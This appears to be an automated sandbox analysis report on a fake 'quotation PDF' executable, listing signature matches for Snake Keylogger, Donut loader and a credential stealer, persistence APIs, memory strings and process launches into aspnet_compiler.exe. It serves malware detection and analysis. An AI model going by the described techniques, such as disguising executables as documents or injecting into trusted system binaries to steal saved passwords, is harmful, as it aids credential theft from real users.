Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925389461.00000210C0A90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
Source: QUOTATION_NOVQTRA071244PDF.scr.exe	Binary or memory string: OriginalFilenameDyaamhymr.exeH vs QUOTATION_NOVQTRA071244PDF.scr.exe

Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7db2c38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d019b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1914720622.00000210A815E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: aspnet_compiler.exe PID: 6180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 6180, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@4/3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT TOP 0 * FROM {0};
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE ROWID = last_insert_rowid();
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1292288325.00000210A5E82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT @countGroupBy AS [countGroupBy], @count AS [count]PDELETE FROM @(Model.TemporaryTableName);RDELETE FROM @@(Model.TemporaryTableName);
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT [PK_@(Model.TemporaryTableNamePK)] PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1292288325.00000210A5E82000.00000002.00000001.01000000.00000003.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1292288325.00000210A5E82000.00000002.00000001.01000000.00000003.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1292288325.00000210A5E82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1292288325.00000210A5E82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoin)) OR ROWID = last_insert_rowid();
Source: aspnet_compiler.exe, 00000005.00000002.2535009068.000001E5100B3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5002E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500311000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50031D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5002D4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5002C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM {0} LIMIT 0;

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: msasn1.dll	Jump to behavior
